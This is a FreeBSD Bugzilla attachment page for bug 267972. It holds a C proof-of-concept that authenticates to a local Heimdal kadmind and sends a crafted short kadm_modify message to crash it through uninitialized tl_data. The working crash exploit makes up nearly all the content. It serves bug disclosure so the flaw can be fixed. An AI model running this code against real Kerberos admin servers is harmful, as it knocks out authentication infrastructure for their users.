FreeBSD Bugzilla – Attachment 238312 Details for
Bug 267972
kadmind can use uninitialized ent.tl_data...tl_data_contents and tl_data_length
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
crash kadmind with a short kadm_modify message
kadmind16a.c (text/plain), 3.09 KB, created by
Robert Morris
on 2022-11-24 18:29:58 UTC
(
hide
)
Description:
crash kadmind with a short kadm_modify message
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2022-11-24 18:29:58 UTC
Size:
3.09 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> >#include <krb5.h> > >unsigned long long aa[] = { >0x85808080ull, >0x0ull, >0x0ull, >0x8080808000000000ull, >0x0ull, >0x0ull, >0x0ull, >0x73840000ull, >}; >int aai; > >int >main(){ > signal(SIGPIPE, SIG_IGN); > > int status; > > krb5_context context; > assert(krb5_init_context(&context) == 0); > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_addr.s_addr = inet_addr("127.0.0.1"); > sin.sin_port = htons(749); > > int s = socket(AF_INET, SOCK_STREAM, 0); > int ret = connect(s, (struct sockaddr *)&sin, sizeof(sin)); > if(ret < 0){ > perror("connect"); > exit(1); > } > > krb5_auth_context auth_context = NULL; > assert(krb5_auth_con_init(context, &auth_context) == 0); > > assert(krb5_auth_con_setaddrs_from_fd(context, auth_context, &s) == 0); > > krb5_principal server; > assert(krb5_sname_to_principal(context, "admin", "kadmin", KRB5_NT_SRV_HST, &server) == 0); > > status = krb5_sendauth(context, > &auth_context, > &s, > "KADM0.1", > NULL, > server, > 0, > NULL, > NULL, > NULL, > NULL, > NULL, > NULL); > if(status) > krb5_err(context, 1, status, "krb5_sendauth"); > > { > // send zero mask for params / realm > char buf[4]; > memset(buf, 0, sizeof(buf)); > krb5_data data; > data.data = buf; > data.length = sizeof(buf); > krb5_data packet; > krb5_data_zero(&packet); > status = krb5_mk_priv(context, > auth_context, > &data, > &packet, > NULL); > if(status) > krb5_err(context, 1, status, "krb5_mk_safe"); > int len = packet.length; > int net_len = htonl(len); > if(krb5_net_write(context, &s, &net_len, 4) != 4){ > perror("krb5_net_write"); > exit(1); > } > if(krb5_net_write(context, &s, packet.data, len) != len){ > perror("krb5_net_write"); > exit(1); > } > } > >#define NN 61 > char buf[NN+7]; > memset(buf, 0x80, sizeof(buf)); > for(int i = 0; i+8 <= sizeof(buf); i += 8) > *(long long *)(buf + i) ^= aa[aai++]; > > krb5_data data; > data.data = buf; > data.length = NN; > > krb5_data packet; > krb5_data_zero(&packet); > > status = krb5_mk_priv(context, > auth_context, > &data, > &packet, > NULL); > if(status) > krb5_err(context, 1, status, "krb5_mk_safe"); > > int len = packet.length; > int net_len = htonl(len); > if(krb5_net_write(context, &s, &net_len, 4) != 4) > perror("krb5_net_write"); > if(krb5_net_write(context, &s, packet.data, len) != len) > perror("krb5_net_write"); > > sleep(1); >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 267972
: 238312